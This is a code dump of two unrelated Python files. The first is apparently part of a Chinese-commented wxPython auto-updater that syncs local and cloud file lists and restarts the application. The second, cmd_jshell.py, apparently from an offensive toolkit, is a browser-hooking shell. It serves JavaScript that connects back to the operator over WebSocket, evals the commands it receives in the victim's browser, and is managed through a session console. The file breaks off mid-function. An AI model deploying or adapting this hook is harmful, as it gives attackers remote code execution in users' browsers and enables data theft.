dict_local_str["filelist"][i]["ver"]) # 获取本地文件及其对应版本号
# 创建本地配置文件属性字典
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["md5"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["ver"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["updatemode"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["ignore"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["url"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["updatedesp"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["path"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["opera"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["restart"])
# 云端文件列表
for i in range(count_cloud):
list_cloud_file.append(dict_cloud_str["filelist"][i]["file"])
list_local_file = list(set(list_local_file)) # 去除文件列表中重复文件
list_cloud_file = list(set(list_cloud_file)) # 去除文件列表中重复文件
# 当本地文件在云端不存在时 删除对应本地文件及相关字典
inter = [i for i in list_local_file if i not in list_cloud_file]
for file_process in inter:
delete_file(list_local_file_dictionary[file_process][6])
list_local_file.remove(file_process)
del list_local_file_dictionary[file_process]
del list_local_file_ver_dictionary[file_process]
count_local = count_local - 1
# 遍历云端的每个文件
for i in range(count_cloud):
if dict_cloud_str["filelist"][i]["file"] in list_local_file:
ver_cloud = dict_cloud_str["filelist"][i]["ver"].split('*')
ver_local = list_local_file_ver_dictionary[dict_cloud_str["filelist"][i]["file"]]
if ver_cloud > ver_local: # 云端文件在本地存在时,判断对应文件版本号是否不一致
list_cloud_update_mode_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_restart_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
# 重新构建新的要升级字典 [该字典顺序不要改动]
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatedesp"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["ver"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["opera"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["url"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["path"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["md5"])
# 更新本地配置文件字典
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][0] = dict_cloud_str["filelist"][i]["md5"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][1] = dict_cloud_str["filelist"][i]["ver"]
if dict_cloud_str["filelist"][i]["updatemode"] == 1:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 0 # 可永久忽略
elif dict_cloud_str["filelist"][i]["updatemode"] == 2:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 1 # 可本次忽略
elif dict_cloud_str["filelist"][i]["updatemode"] == 3:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 2 # 强制升级
elif dict_cloud_str["filelist"][i]["updatemode"] == 0:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 3 # 静默升级
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][3] = 0 # ignore
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][4] = dict_cloud_str["filelist"][i]["url"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][5] = dict_cloud_str["filelist"][i]["updatedesp"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][6] = dict_cloud_str["filelist"][i]["path"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][7] = dict_cloud_str["filelist"][i]["opera"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][8] = dict_cloud_str["filelist"][i]["restart"]
else: # 云端文件在本地不存在 存在全新下载文件
list_cloud_update_mode_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_restart_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["restart"])
# 构建本地不存在的文件字典 [该字典顺序不要改动]
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatedesp"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["ver"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["opera"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["url"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["path"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["md5"])
# 追加更新本地配置文件字典
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["md5"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["ver"])
if dict_cloud_str["filelist"][i]["updatemode"] == 1:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(0)
elif dict_cloud_str["filelist"][i]["updatemode"] == 2:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(1)
elif dict_cloud_str["filelist"][i]["updatemode"] == 3:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(2)
elif dict_cloud_str["filelist"][i]["updatemode"] == 0:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(3)
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(0) # ignore 默认为0 无操作
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["url"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatedesp"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["path"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["opera"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
# 合并云端的两个字典(云端在本地存在文件字典和云端在本地不存在文件字典)
list_cloud_update_mode_file_dictionary.update(list_cloud_update_mode_unexit_file_dictionary)
list_cloud_restart_file_dictionary.update(list_cloud_restart_unexit_file_dictionary)
list_cloud_file_dictionary.update(list_cloud_file_unexit_dictionary)
list_local_file_dictionary.update(list_local_unexit_file_dictionary)
#########################################################################
# -------------------------------------------------------------------
# 判断value长度是不是超过正常
# 超过时从字典中取出来存到一个新的字典里,并从原来字典中删除
# 与之前字典合并 ,该算法以[适应组合升级时(下载、解压、删除时),字典key唯一情况]
# 请不要改动该部分内容
# -------------------------------------------------------------------
multiple_cloud_temp = copy.deepcopy(list_cloud_file_dictionary)
multiple_local_temp = copy.deepcopy(list_local_file_dictionary)
temp_cloud = {}
temp_local = {}
for file_process in list_local_file_dictionary.items():
if len(file_process[1]) > 9:
del multiple_local_temp[file_process[0]]
r = cut([i for i in file_process[1]], 9)
for i in range(int(len(file_process[1]) / 9)):
for j in range(9):
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][j])
for file_process in list_cloud_file_dictionary.items():
if len(file_process[1]) > 8:
del multiple_cloud_temp[file_process[0]]
if file_process[0] in multiple_local_temp.keys():
del multiple_local_temp[file_process[0]]
r = cut([i for i in file_process[1]], 8)
for i in range(int(len(file_process[1]) / 8)):
for j in range(8):
temp_cloud.setdefault(file_process[0] + '#' + str(i), []).append(r[i][j])
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][7]) # md5
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][2]) # ver
if r[i][0] == 1:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(0) # updatemode
elif r[i][0] == 2:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(1) # updatemode
elif r[i][0] == 3:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(2) # updatemode
elif r[i][0] == 0:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(3) # updatemode
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(0) # ignore
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][4]) # url
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][1]) # updatedesp
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][6]) # path
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][3]) # opera
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][5]) # restart
multiple_cloud_temp.update(temp_cloud)
multiple_local_temp.update(temp_local)
list_cloud_file_dictionary = copy.deepcopy(multiple_cloud_temp)
list_local_file_dictionary = copy.deepcopy(multiple_local_temp)
#########################################################################
if not list_cloud_file_dictionary and cloud_version_newst_get() == version_current_get: # 比对后比对后为空则表示无新升级内容
print("比对后无新升级文件!")
list_alarm = [] # 定义提示列表
list_dictionary = {} # 定义提示更新的文件字典
for i in list_local_file_dictionary.items():
if (i[1][2] == 0 and i[1][3] == 0) or (i[1][2] != 0 and i[1][2] != 3 and i[1][3] != 1):
# 存放到可永久忽略提示字典中
list_alarm.append(i[0])
if list_alarm:
# 把所有要提示的文件存放到字典中
for fileprocess in list_alarm:
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][0]) # md5
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][1]) # ver
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][2]) # updatemode
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][3]) # ignore
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][4]) # url
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][5]) # updatedesp
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][6]) # path
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][7]) # opera
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][8]) # restart
if list_dictionary:
ifUpdateForce = 0
# 是否有强制升级
for file_process in list_dictionary.items():
if file_process[1][2] == 2:
ifUpdateForce = 1
break
if ifUpdateForce:
# 提示用户更新文件及信息,版本号
update_show_text = {} # 定义给用户提示的内容字典 提示内容包括[文件名 文件版本号 升级内容]
for i in list_dictionary.items():
update_show_text.setdefault(i[0], []).append(i[1][5])
update_show_text.setdefault(i[0], []).append(i[1][1])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"强制升级提醒", wx.YES_NO).ShowModal()
# result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"更新提示(非强制)", wx.YES_NO).ShowModal()
# result.SetMessage(dict_update_str["update-message"])
# result.ShowModal()
result = wx.MessageDialog(None, dict_update_str["update-message"], u"更新提示(非强制)", wx.YES_NO).ShowModal()
if result == wx.ID_YES:
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_dictionary.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][0], file_process[1][7]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
if file_process[1][8] == 1:
restart_flag = 1 # 重启程序
elif result == wx.ID_NO:
print("用户选择不升级,继续运行主应用程序!")
for file_process in list_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 0
# exit_flag = 1
# os.system('taskkill /f /im QPYcom.exe')
autoMessageBar(dict_update_str)
else: # 只存在忽略模式
# 提示用户更新文件及信息,版本号
update_show_text = {} # 定义给用户提示的内容字典 提示内容包括[文件名 文件版本号 升级内容]
for i in list_dictionary.items():
update_show_text.setdefault(i[0], []).append(i[1][5])
update_show_text.setdefault(i[0], []).append(i[1][1])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"可忽略升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"可忽略升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
if result == wx.ID_YES:
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_dictionary.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][0], file_process[1][7]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
if file_process[1][8] == 1:
restart_flag = 1 # 重启程序
elif result == wx.ID_NO:
for file_process in list_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 2
elif result == wx.ID_CANCEL:
for file_process in list_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 0
else:
if id == 1:
print("手动检查无更新,窗口提示!")
wx.MessageDialog(None, "已经是最新版本,无新升级内容", u"提醒", wx.OK).ShowModal()
else:
print("定时检查无更新,不窗口提示!")
autoMessageBar(dict_update_str)
else:
# 兼容组合拳升级操作模式写法
list_update_mode = []
list_restart_mode = []
for list_value_update in list_cloud_update_mode_file_dictionary.values():
for value in list_value_update:
list_update_mode.append(value)
for list_value_restart in list_cloud_restart_file_dictionary.values():
for value in list_value_restart:
list_restart_mode.append(value)
# 根据需要升级文件列表的[升级模式] 提示用户对应的操作
if 3 in list_update_mode: # 存在强制升级模式
print("本次升级模式存在强制升级文件")
list_cloud_file_dictionary_temp = copy.deepcopy(list_cloud_file_dictionary)
for file_process in list_cloud_file_dictionary.items():
if file_process[1][0] == 0: # 静默升级文件
del list_cloud_file_dictionary_temp[file_process[0]]
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
if list_cloud_file_dictionary_temp: # 剔除静默升级文件后
sorted_dictionary = sorted(list_cloud_file_dictionary_temp.items(),
key=lambda list_cloud_file_dictionary: list_cloud_file_dictionary[1],
reverse=True)
update_show_text = {} # 定义给用户提示的内容字典 降序提示内容包括[文件名 文件版本号 升级内容]
for i in sorted_dictionary:
update_show_text.setdefault(i[0], []).append(i[1][1])
update_show_text.setdefault(i[0], []).append(i[1][2])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"强制升级提醒", wx.YES_NO).ShowModal()
# result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"强制升级提醒", wx.YES_NO).ShowModal()
# result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"更新提示(非强制)", wx.YES_NO)、
result = wx.MessageDialog(None, dict_update_str["update-message"], u"更新提示(非强制)", wx.YES_NO).ShowModal()
if result == wx.ID_YES: # 当用户点击确认升级操作后
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_cloud_file_dictionary_temp.items():
# 只要存在强制升级则对字典中的每一个文件执行升级,判断对应文件的opera操作模式
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
elif result == wx.ID_NO: # 用户选择不升级 则直接退出主应用程序
print("用户选择不升级,直接退出主应用程序!")
for file_process in list_cloud_file_dictionary_temp.items():
list_local_file_dictionary[file_process[0]][3] = 0
# os.system('taskkill /f /im QPYcom.exe')
# exit_flag = 1
autoMessageBar(dict_update_str)
return
# 待所有文件操作模式执行完成后判断是否有需要重启的文件 一旦有则重启主程序 否则为热更新
if 1 in list_restart_mode: # 存在重启主程序操作
wx.MessageDialog(None, "程序检测到有更新,需要重启完成", u"提醒", wx.OK).ShowModal()
restart_flag = 1
# 找出所有静默升级的文件进行升级,同时从升级文件字典中剔除,剩余忽略模式文件 静默模式存在 0 0 0和 0 1 2这种格式
elif 0 in list_update_mode: # 存在静默升级模式
print("本次升级包含静默升级文件!")
list_cloud_file_dictionary_temp = copy.deepcopy(list_cloud_file_dictionary)
for file_process in list_cloud_file_dictionary.items():
if file_process[1][0] == 0:
del list_cloud_file_dictionary_temp[file_process[0]]
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
if list_cloud_file_dictionary_temp: # 判断剔除静默模式后的字典是否为空,不空则提示用户有升级信息(只包含1和2两种)
print("字典不空,既包含静默升级文件,也包含忽略升级模式文件!")
sorted_dictionary = sorted(list_cloud_file_dictionary_temp.items(),
key=lambda list_cloud_file_dictionary: list_cloud_file_dictionary[1],
reverse=True)
update_show_text = {} # 定义给用户提示的内容字典 提示内容包括[文件名 文件版本号 升级内容]
for i in sorted_dictionary:
update_show_text.setdefault(i[0], []).append(i[1][1])
update_show_text.setdefault(i[0], []).append(i[1][2])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
if result == wx.ID_YES: # 当用户点击确认升级操作后
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_cloud_file_dictionary_temp.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
elif result == wx.ID_NO: # 当用户点击忽略操作后
print("用户选择忽略升级!")
for file_process in list_cloud_file_dictionary_temp.items():
list_local_file_dictionary[file_process[0]][3] = 2
elif result == wx.ID_CANCEL:
print("用户选择无操作!")
for file_process in list_cloud_file_dictionary_temp.items():
list_local_file_dictionary[file_process[0]][3] = 0
else:
print("字典为空,只包含全0静默升级文件!")
# 待所有文件操作模式完成后判断是否有需要重启的文件 一旦有则重启整个应用程序 否则为热更新
if 1 in list_restart_mode: # 存在重启程序操作
# wx.MessageDialog(None, "程序检测到有更新,需要重启完成", u"提醒", wx.OK).ShowModal()
restart_flag = 1 # 程序重启标志位
# 剩下的文件均是可忽略升级模式(只包含永久忽略和本次忽略) [1,1,1] [2,2,2] [1,2,1]
else:
print("本次升级只包含可忽略的文件")
sorted_dictionary = sorted(list_cloud_file_dictionary.items(),
key=lambda list_cloud_file_dictionary: list_cloud_file_dictionary[1],
reverse=True)
update_show_text = {} # 定义给用户提示的内容字典 提示内容包括[文件名 文件版本号 升级内容]
for i in sorted_dictionary:
update_show_text.setdefault(i[0], []).append(i[1][1])
update_show_text.setdefault(i[0], []).append(i[1][2])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"升级-可忽略升级", wx.YES_NO | wx.CANCEL).ShowModal()
result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"可忽略升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
if result == wx.ID_YES: # 当用户点击升级操作后
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_cloud_file_dictionary.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
# 待所有文件操作模式执行完成后判断是否有需要重启的文件 一旦有则重启主程序 否则为热更新
if 1 in list_restart_mode: # 存在重启程序操作
wx.MessageDialog(None, "程序检查有更新需要重启", u"提醒", wx.OK).ShowModal()
restart_flag = 1
elif result == wx.ID_NO: # 用户选择不升级 [1,1,1] [2,2,2] [1,2,1]
print("用户选择忽略升级!")
for file_process in list_cloud_file_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 2
elif result == wx.ID_CANCEL: # 用户没有操作
print("用户无操作!")
for file_process in list_cloud_file_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 0
# 保存最新的本地配置文件字典到本地json配置文件
local_json = {"filelist": []}
for k in list_local_file_dictionary.keys():
if '#' in k: # 组合升级情况
temp_str = k.split('#')[0]
else:
temp_str = k
local_json["filelist"].append({'file': temp_str,
'md5': list_local_file_dictionary[k][0],
'ver': list_local_file_dictionary[k][1],
'updatemode': list_local_file_dictionary[k][2],
'ignore': list_local_file_dictionary[k][3],
'url': list_local_file_dictionary[k][4],
'updatedesp': list_local_file_dictionary[k][5],
'path': list_local_file_dictionary[k][6],
'opera': list_local_file_dictionary[k][7],
'restart': list_local_file_dictionary[k][8]},
)
# local_json_over = {"totalcount": len(list(set(list_cloud_file + list_local_file)))} # count 为合并本地云端,剔除重复元素后的长度
local_json_over = {"totalcount": len(list_local_file_dictionary.keys())}
local_json_over.update(local_json)
json_str = json.dumps(local_json_over, indent=4)
local_json_path = os.getcwd() + "\\" + "local_conf.json"
with open(local_json_path, 'w') as json_file:
json_file.write(json_str)
if update_fail_flag == 1 and update_select_flag == 1:
print("本次升级失败!")
window.close()
wx.MessageDialog(None, "软件更新失败! 请前往官网下载工具新版本。", u"提醒", wx.OK).ShowModal()
elif update_fail_flag == 0 and update_select_flag == 1:
print("本次升级成功!")
window.close()
wx.MessageDialog(None, "软件更新成功!", u"提醒", wx.OK).ShowModal()
if restart_flag == 0: # 应用程序是否重启操作,通过restart_flag标志来确保操作完成后才重启(这种情况代表正常启动)
pass
elif main_program_flag == 1 and update_fail_flag == 0:
DETACHED_PROCESS = 0x08000000
subprocess.call('restart.bat', creationflags=DETACHED_PROCESS) # 执行restart.bat
else:
restart_program()
'''
if exit_flag == 0: # 应用程序是否退出,通过exit_flag标志来确保操作完成后才重启
pass
else:
os.system('taskkill /f /im QPYcom.exe.exe')
'''
# 手动检查是否有更新 被主程序引用
def thread_process_handle():
t = threading.Thread(target=json_process_handle, args=(1,))
t.start()
class RepeatingTimer(Timer):
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
# 定时检查是否有更新 被主程序引用 时间为两小时
def repeat_update_check():
global check_update_time
t = RepeatingTimer(check_update_time, json_process_handle, args=(0,))
t.start()
# 定义软件升级提醒窗口
def autoUpdataProgressBar():
t1 = threading.Thread(target=updateWindow)
t1.start()
# 定义提示窗口
def autoMessageBar(json_str):
# global update_messageCount
try:
force_read = json_str["force-read"] # 强制阅读模式
avail_data = json_str["avail-data"] # 弹窗显示开始时间
expire_data = json_str["expire-data"] # 弹窗显示结束时间
payload = json_str["payload"] # 需要弹窗显示的信息
pop_mode = json_str["pop-mode"] # 弹窗显示模式
if int(pop_mode) > 0:
if force_read == "0": #强制阅读模式"
if parse(avail_data) < datetime.datetime.now() < parse(expire_data): #在有效时间内
wx.MessageDialog(None, payload, u"更新信息提示", wx.OK).ShowModal()
# update_message = wx.MessageBox(None, dict_update_str["payload"], u"更新信息提示", wx.YES_DEFAULT | wx.ICON_INFORMATION).ShowModal(
json_str["pop-mode"] = int(json_str["pop-mode"]) - 1
# print(json_str)
with open(os.getcwd() + '\\' + 'update_message.json', 'w',encoding='utf-8') as f:
json.dump(json_str, f, ensure_ascii=False, indent=2)
else:
print("弹窗提示显示指定次数已完成")
except:
print("update-message配置文件加载失败")
if __name__ == '__main__':
thread_process_handle()
# repeat_update_check()
# autoUpdataProgressBar()
|
cmd_jshell.py
|
#!/usr/bin/env python3
import asyncio
import json
import threading
from datetime import datetime
from http import HTTPStatus
from pathlib import Path
from pprint import pprint
from queue import Queue
import click
import websockets
from prompt_toolkit.contrib.completers import WordCompleter
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.layout.lexers import PygmentsLexer
from prompt_toolkit.shortcuts import prompt
from pygments.lexers import JavascriptLexer
from habu.config import config
from habu.lib.completeme.javascript import javascript as completer_list
hook_js = '''
endpoint = "ws://{ip}:{port}";
socket = new WebSocket(endpoint);
socket.onmessage = function(event){{
try {{
out = eval(event.data);
socket.send(out);
}}
catch(err) {{
socket.send(err);
}};
}};
'''
class MyWebSocketServerProtocol(websockets.server.WebSocketServerProtocol):
''' This returns the hook.js file if the requests is not a WebSocket request '''
@asyncio.coroutine
def process_request(self, path, request_headers):
if 'Upgrade' in request_headers.keys():
return None
print('>>> HTTP Request received from {}. Sending hookjs'.format(self.remote_address[0]))
if path.endswith('.js'):
response_headers = [
('Content-Lenght', len(hook_js)),
('Content-type', 'application/javascript'),
]
return (HTTPStatus.OK, response_headers, hook_js.encode())
document = '<html><body><script>' + hook_js + '</script></body></html>'
response_headers = [
('Content-Lenght', len(document)),
('Content-type', 'text/html'),
]
return (HTTPStatus.OK, response_headers, document.encode())
class Runner():
def __init__(self):
self.internal_commands = {
'_close': ('Closes the websocket', self.cmd_close),
'_help' : ('Show this help', self.cmd_help),
'_sessions' : ('List active sessions', self.cmd_sessions),
'_channel' : ('Print channel log', self.cmd_channel),
'_active' : ('Set active session (param: session_id)', self.cmd_active),
'_websocket': ('Show websocket info', self.cmd_websocket),
}
self.get_external_commands()
self.active = None
self.sessions = {}
def addifnew(self, websocket):
for s in self.sessions.values():
if s['websocket'] == websocket:
return False
if len(self.sessions) == 0:
session_id = '0'
else:
session_id = str(int(sorted(self.sessions.keys(), reverse=True)[0]) + 1)
self.sessions[session_id] = {
'name': '{}:{} {}'.format(
websocket.remote_address[0],
websocket.remote_address[1],
websocket.request_headers.get('User-Agent', 'No User Agent?'),
),
'websocket': websocket,
}
print(">>> Connection from {}".format(websocket.remote_address[0]))
return True
def get_external_commands(self):
self.external_commands = {}
for f in (config['DATADIR'] / 'jshell-commands').glob('*.js'):
with f.open() as cmd_file:
cmd_name = '_' + f.stem
cmd_help = cmd_file.readline().replace('//', '').strip()
cmd_content = cmd_file.read()
self.external_commands[cmd_name] = (cmd_help, cmd_content)
def cmd_close(self):
print(">>> Closing connection")
for i in list(self.sessions):
if self.sessions[i]['websocket'] == self.active:
del self.sessions[i]
self.active = None
def cmd_sessions(self):
for i,s in self.sessions.items():
if self.active == s:
print('{} * {}'.format(i, s['name']))
else:
print('{} {}'.format(i, s['name']))
return True
def cmd_channel(self):
outfile = Path('session-{}-{}.txt'.format(self.active['websocket'].remote_address[0], self.active['websocket'].remote_address[1]))
if outfile.is_file():
with outfile.open() as of:
print(of.read(), '\n')
else:
print('No channel log yet')
def cmd_websocket(self):
pprint(dir(self.active['websocket']))
pprint(self.active['websocket'])
pprint(self.active['websocket'].request_headers)
pprint(dir(self.active['websocket'].request_headers))
pprint(self.active['websocket'].request_headers.get('User-Agent', 'No User Agent?'))
return True
def cmd_active(self, i):
i = str(i)
session = self.sessions.get(i, None)
if session:
if session['websocket'].open:
self.active = session
else:
print('Session is closed')
del self.sessions[i]
else:
print('Invalid session id')
def cmd_help(self):
print('\nInternal Commands ================================')
for cmd_name in self.internal_commands.keys():
print('{:<20} {}'.format(cmd_name, self.internal_commands[cmd_name][0]))
print('\nExternal Commands ================================')
for cmd_name in self.external_commands.keys():
print('{:<20} {}'.format(cmd_name, self.external_commands[cmd_name][0]))
async def send(self, command):
await self.active['websocket'].send(command)
async def run(self, command):
if not self.sessions:
print('No sessions')
return False
if not self.active:
for s in self.sessions.values():
